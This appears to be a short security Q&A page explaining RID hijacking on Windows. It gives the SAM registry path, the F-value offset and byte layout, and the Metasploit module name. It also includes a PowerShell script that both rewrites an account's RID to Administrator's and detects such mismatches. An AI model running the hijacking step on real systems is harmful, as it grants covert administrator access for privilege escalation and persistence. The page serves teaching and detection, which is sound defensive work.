One Day Sec

How can an attacker perform RID hijacking on a Windows system?

First, the attacker needs SYSTEM privileges: the SAM hive under `HKEY_LOCAL_MACHINE\SAM` is ACL'd so that by default not even local administrators can open it. Running as SYSTEM (for example via `psexec -s` or Meterpreter's `getsystem`), they open `HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users` and locate the subkey named after the low-privilege account's RID in 8-digit hexadecimal (e.g., `000003E9` for RID 1001). That subkey's `F` value is a binary blob in which the account's RID is stored as a 32-bit little-endian integer at offset 0x30 (low byte at 0x30, next byte at 0x31), so RID 1001 appears as `E9 03 00 00`. They overwrite it with the target RID: `F4 01 00 00` for the built-in Administrator (RID 500, i.e. 0x01F4 written little-endian). Windows derives the account's SID from this field when it builds a logon token, so after the account logs off and back on its session carries the Administrator SID and every group membership and privilege that goes with it, while the account keeps its own name and password. The Metasploit post module `post/windows/manage/rid_hijack` automates the whole sequence (and can optionally enable and hijack the Guest account). The same artifact is what a defender checks for: a user subkey whose name disagrees with the RID stored in its `F` value.
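The procedure above as a PowerShell script, added here as an illustration and not code from the original page or from the Metasploit module. It must run as SYSTEM (e.g. `psexec -s -i powershell.exe`), it assumes the low-privilege account has RID 1001 and the target is the built-in Administrator (RID 500), both illustrative values, and it adds the defender-side check the answer alludes to: enumerating every user subkey and flagging any whose name does not match the RID in its `F` value. The `Names` subkey is skipped because it is the name-to-RID index under `Users`, not an account.

```powershell
# Added example, not the page's or Metasploit's own code.
# Run as SYSTEM (e.g. psexec -s -i powershell.exe): the SAM hive is ACL'd so
# that only SYSTEM can open it.
# Assumed values: victim account RID 1001 (key 000003E9), target RID 500.

$UsersKeyPath = 'SAM\SAM\Domains\Account\Users'
$RidOffset    = 0x30   # the RID sits here in the F value, 32-bit little-endian

function Get-SamUserKey {
    param([uint32]$Rid, [switch]$Writable)
    # Subkey names are the RID as 8 hex digits, e.g. ...\Users\000003E9
    $sub = '{0}\{1:X8}' -f $UsersKeyPath, $Rid
    $key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey($sub, [bool]$Writable)
    if (-not $key) { throw "No SAM user key for RID $Rid (not running as SYSTEM?)" }
    return $key
}

function Get-FValueRid {
    param([uint32]$Rid)
    $key = Get-SamUserKey -Rid $Rid
    try {
        $f = [byte[]]$key.GetValue('F')
        # BitConverter reads little-endian on Windows, so E9 03 00 00 -> 1001
        return [BitConverter]::ToUInt32($f, $RidOffset)
    } finally { $key.Close() }
}

function Set-FValueRid {
    param([uint32]$Rid, [uint32]$NewRid)
    $key = Get-SamUserKey -Rid $Rid -Writable
    try {
        $f   = [byte[]]$key.GetValue('F')
        $old = [BitConverter]::ToUInt32($f, $RidOffset)
        # 500 becomes F4 01 00 00; copy those 4 bytes over offsets 0x30..0x33
        [Array]::Copy([BitConverter]::GetBytes($NewRid), 0, $f, $RidOffset, 4)
        $key.SetValue('F', $f, [Microsoft.Win32.RegistryValueKind]::Binary)
        Write-Host ("Account RID {0}: F-value RID {1} -> {2} (takes effect at next logon)" -f $Rid, $old, $NewRid)
    } finally { $key.Close() }
}

function Find-HijackedRids {
    # Defender check: every user subkey whose F-value RID disagrees with its name
    $users = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey($UsersKeyPath)
    try {
        foreach ($name in $users.GetSubKeyNames()) {
            if ($name -eq 'Names') { continue }   # name->RID index, not an account
            $keyRid = [Convert]::ToUInt32($name, 16)
            $fRid   = Get-FValueRid -Rid $keyRid
            if ($fRid -ne $keyRid) {
                [pscustomobject]@{ SubKey = $name; KeyRid = $keyRid; FValueRid = $fRid }
            }
        }
    } finally { $users.Close() }
}

# Attacker side: make RID 1001 obtain Administrator's SID (RID 500) at next logon.
Set-FValueRid -Rid 1001 -NewRid 500

# Defender side: prints one object per mismatched account, nothing when clean.
Find-HijackedRids
```

`Find-HijackedRids` is cheap enough to run from a scheduled task or an EDR script as SYSTEM; a healthy SAM returns nothing, and any object it emits names the hijacked subkey and the RID it now resolves to.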
Tags: RID hijacking, registry editing, SYSTEM privileges, Metasploit, Windows security
